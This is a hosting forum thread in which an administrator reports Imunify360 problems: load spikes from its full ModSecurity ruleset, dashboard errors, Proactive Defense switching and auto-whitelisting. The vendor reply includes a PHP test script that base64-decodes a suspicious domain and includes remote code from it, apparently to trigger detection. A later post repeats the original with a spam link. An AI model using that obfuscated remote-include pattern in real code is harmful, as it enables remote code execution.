Imunify 360, server load and some notes
Forum
  1. Forums
  2. Imunify360
  3. Imunify360 and Imunify Sensor
  1. Nick
  2. Friday, 20 December 2019
  3.  Subscribe via email
Hello

I am testing imunify360 considering to switch/add to csf and cxs

It does a great job blocking wp-login brute force attacks and has find some infected very old files that maldet and cxs were not able to detect

But there are some issues

tested on cpanel cloudlinux server with about 500 small sites , load average 2 to 3 under normal conditions and half of 64GB memory usually free

Disabled cxs, fail2ban , deleted all other modsec vendors, installed. Csf remains active

1) With the full set of modsec rules ( 25 rules set) the server load skyrockets from 2-3 to 20 -50

Also the peaks are so robust, between 2-3 top command refresh, the load goes from eg 5 to 40

Observed for many hours hopping that caused from inotify indexing, but the load remained high

Uninstalled and installed 3 times, after deleting /etc/ and /var imunify folders in case accidentally misconfiguration caused this behavior, same high load

Then i switched to the mini modesc and the load goes to 3-4 , almost normal, maybe 0.5 to 1 more load than usual. Acceptable.

I noticed that the full set has 4 extra rulesets

Include "/etc/apache2/conf.d/modsec_vendor_configs/imunify360_full_apache/116_Apps_JComponent.conf"
Include "/etc/apache2/conf.d/modsec_vendor_configs/imunify360_full_apache/118_Apps_WPPlugin.conf"
Include "/etc/apache2/conf.d/modsec_vendor_configs/imunify360_full_apache/119_Apps_WHMCS.conf"
Include "/etc/apache2/conf.d/modsec_vendor_configs/imunify360_full_apache/121_Apps_OtherApps.conf"


I enabled them one at a time

118_Apps_WPPlugin.conf is causing about 100% more load and 121_Apps_OtherApps.conf is causing 500% to 1000% more load

Also, when using the full modsec set, even with this 4 ruleset disabled, the server more load spices and is some how more unpredictable and unstable

So the only option for this particular server is to run imunify360 with the mini rule set

Maybe this is voodoo related -:) , i will continue tests with other servers

Forgot to mention that at some point a have upgraded to the roll-out version, same behavior

2) Dashboard

Dashboard graphs not working today , i get a red error banner in top right of the dashbord page
Error
Internal Error

And

Failed to fetch data. Specify more narrow period or try again later.

3) Proactive Defense

When i change mode to Proactive Defense, the new mode is activated only when i manual restart the service

systemctl restart imunify360-webshield.service

tested with

https://docs.imunify360.com/dashboard/#user-interface

How to test Proactive Defense


4) Auto white list

I dont like the auto white list feature

When someone logs in to cpanel , gets whitelisted for some hours

Than means, if someone steals a cpanel password, he is free to do anything without firewall block

I have changed the
AUTO_WHITELIST:
timeout: 1440 # set in minutes how long to keep automatically whitelisted IP

from 1440 to 1, but users are still white-listed for 3 hours

It would be nice to have an option to disable the auto white list feature
Rate this post:
  1. 20.12.2019 17:12:25
  2. # 1
Sergey Khristich Accepted Answer
Posts: 263
Joined: 20.05.2019
0
Votes
Undo
Hello Nick,
Thank you for reaching out!
1) This is a confirmation that the additional load caused by full ruleset varies across systems, and that is why there exists the minified ruleset. We are constantly working on making the full ruleset fast on any system with any configuration, and hopefully one of the nearest releases of full ruleset will not be causing such a significant additional load on your system.
2) This would require a ticket so that we can take a closer look into the problem.
3) A proactive defense can be tested with the help of a script like the following one:

<?php /* Imunify360 Proactive Defence test script */ echo "<pre>"; echo "Step 1<br>"; // Decode string with domain: 37kddsserrt.xyz $url=base64_decode("MzdrZGRzc2VycnQueHl6"); echo "Step 2<br>"; echo "</pre>"; // Try to access a malicious domain include($url); die(); ?>

4) This would require a ticket so that we can raise an internal feature request and have the product development team discuss and possibly implement this.
Please create a ticket here https://cloudlinux.zendesk.com/hc/en-us/requests/new and technical experts will help you asap.
If you have any other questions, feel free to ask here. Thank you for contacting us.
Marketing Manager
  1. 03.02.2020 13:02:33
  2. # 2
Myrtle Rankind Accepted Answer
Posts: 4
Joined: 31.01.2020
0
Votes
Undo
Hello

I am testing imunify360 considering to switch/add to csf and cxs

It does a great job blocking wp-login brute force attacks and has find some infected very old files that maldet and cxs were not able to detect

But there are some issues

tested on cpanel cloudlinux server with about 500 small sites , load average 2 to 3 under normal conditions and half of 64GB memory usually free

Disabled cxs, fail2ban , deleted all other modsec vendors, installed. Csf remains active

1) With the full set of modsec rules ( 25 rules set) the server load skyrockets from 2-3 to 20 -50

Also the peaks are so robust, between 2-3 top command refresh, the load goes from eg 5 to 40

Observed for many hours hopping that caused from inotify indexing, but the load remained high

Uninstalled and installed 3 times, after deleting /etc/ and /var imunify folders in case accidentally misconfiguration caused this behavior, same high load

Then i switched to the mini modesc and the load goes to 3-4 , almost normal, maybe 0.5 to 1 more load than usual. Acceptable.

I noticed that the full set has 4 extra rulesets

Include "/etc/apache2/conf.d/modsec_vendor_configs/imunify360_full_apache/116_Apps_JComponent.conf"
Include "/etc/apache2/conf.d/modsec_vendor_configs/imunify360_full_apache/118_Apps_WPPlugin.conf"
Include "/etc/apache2/conf.d/modsec_vendor_configs/imunify360_full_apache/119_Apps_WHMCS.conf"
Include "/etc/apache2/conf.d/modsec_vendor_configs/imunify360_full_apache/121_Apps_OtherApps.conf"


I enabled them one at a time

118_Apps_WPPlugin.conf is causing about 100% more load and 121_Apps_OtherApps.conf is causing 500% to 1000% more load

Also, when using the full modsec set, even with this 4 ruleset disabled, the server more load spices and is some how more unpredictable and unstable

So the only option for this particular server is to run imunify360 with the mini rule set

Maybe this is voodoo related -:) , i will continue tests with other servers

Forgot to mention that at some point a have upgraded to the roll-out version, same behavior

2) Dashboard

Dashboard graphs not working today , i get a red error banner in top right of the dashbord page
Error
Internal Error

And

Failed to fetch data. Specify more narrow period or try again later.

3) Proactive Defense

When i change mode to Proactive Defense, the new mode is activated only when i manual restart the service

systemctl restart imunify360-webshield.service

tested with

https://docs.imunify360.com/dashboard/#user-interface https://www.wowessays.com/

How to test Proactive Defense


4) Auto white list

I dont like the auto white list feature

When someone logs in to cpanel , gets whitelisted for some hours

Than means, if someone steals a cpanel password, he is free to do anything without firewall block

I have changed the
AUTO_WHITELIST:
timeout: 1440 # set in minutes how long to keep automatically whitelisted IP

from 1440 to 1, but users are still white-listed for 3 hours

It would be nice to have an option to disable the auto white list feature



You made nice job. You created ticket following the link Sergey provided for you?
  • Page :
  • 1


There are no replies made for this post yet.
Be one of the first to reply to this post!
Guest
Submit Your Response
Upload files or images for this discussion by clicking on the upload button below. Supports gif,jpg,png,zip,rar,pdf
• Insert • Remove Upload Files (Maximum File Size: 2 MB)
Captcha
To protect the site from bots and unauthorized scripts, we require that you enter the captcha codes below before posting your question.